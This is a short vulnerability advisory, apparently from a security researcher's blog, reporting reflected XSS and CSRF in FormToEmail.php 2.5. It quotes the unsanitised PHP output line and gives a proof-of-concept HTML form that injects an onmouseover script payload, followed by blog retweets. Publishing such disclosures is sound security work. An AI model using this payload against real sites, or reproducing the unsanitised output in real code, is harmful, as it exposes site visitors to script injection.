* Exploit Title: Reflective XSS
* Discovery Date: 02/09/2016
* Public Disclosure Date:03/10/2016
* Exploit Author: CJ Chamberland
* Contact: @cjchamberland - http://cjchamberland.com
* Vendor Homepage: formtoemail.com
* Software Link: formtoemail.com (formtoemail.php free is available for download from this site)
* Version: 2.5
* Tested on: apache/mac os
* Category: webapps
* Ident: OVE-20160305-2496
Description
================================================================================
Form accepts and processes un-sanitized input from forms, it is also susceptible to CSRF:
Line 234: Thank you <?php if(isset($_REQUEST['name'])){print stripslashes($_REQUEST['name']);} ?>
PoC
================================================================================
<form method=post action="FormToEmail.php">
<input type=text name="name" value="<div onmouseover=alert(0);>Bob</div>">
<input type=submit>
</form>Web Security, Malware Research & Other Junk
Latest
Latest Tweets
RT @opendotfilm: At WordCamp Europe, we asked our friend Milos Mihaljevic from ManageWP what "open" means. To Milos, open is about s… https://t.co/Hf9Qsqtcr7
RT @mmaunder: I had a wonderful chat with Ryan Dewhurst AKA @ethicalhack3r at #WCEU yesterday about WPScan, a command line tool t… https://t.co/bTPwmWnZOD
RT @TheTweetOfGod: Life begins the moment you leave Alabama.
RT @wordfence: Announcing 3 New Login Security Features including FREE Two Factor Authentication! #Security4All www.wordfence.com/blog/2019/05… via @wordfence
RT @wordfence: Have a hacked website you've been putting off dealing with? Our security services are currently discounted by 30%.… https://t.co/evEQg0cSJY